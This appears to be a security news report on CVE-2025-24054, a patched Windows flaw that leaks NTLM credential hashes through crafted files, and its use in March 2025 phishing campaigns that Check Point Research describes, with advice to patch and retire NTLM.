A recently discovered Windows vulnerability (CVE-2025-24054) that exposes user authentication credentials has been actively exploited in targeted attacks against government and private organizations in Poland and Romania, security researchers revealed.
The vulnerability, patched by Microsoft in March 2025, allows attackers to capture authentication data known as NTLM hashes when users interact with specially crafted malicious files. These captured credentials can then be used to gain unauthorized system access.
According to Check Point Research, the first attacks leveraging this flaw began on March 19, 2025, just days after Microsoft released security patches. The campaigns used phishing emails containing malicious archive files downloaded from Dropbox to steal user credentials.
"The attackers carefully constructed phishing emails to trick targets into downloading attachments containing exploit files," explained Check Point researchers. "When victims downloaded and interacted with these files, their authentication credentials were automatically leaked to attacker-controlled servers."
The research team observed approximately 10 different attack campaigns between March 19-25, targeting organizations worldwide. The malicious servers collecting stolen credentials were traced to multiple countries including Russia, Bulgaria, Netherlands, Australia, and Turkey.
One of the IP addresses used in the attacks was previously linked to APT28, a threat group believed to be connected to Russian state-sponsored activities. However, researchers note there is currently insufficient evidence to definitively attribute these specific campaigns.
Microsoft has released patches for all supported Windows versions to address the vulnerability. Organizations still running older unsupported Windows versions can implement micropatching as an alternative solution.
Security experts recommend organizations promptly apply available patches and consider moving away from NTLM authentication, which Microsoft officially deprecated last year in favor of more secure protocols like Kerberos.
The rapid exploitation of this vulnerability highlights the need for organizations to quickly address security flaws, even those initially deemed lower risk. While not as severe as remote code execution bugs, credential theft vulnerabilities can still enable damaging network compromises when exploited by determined attackers.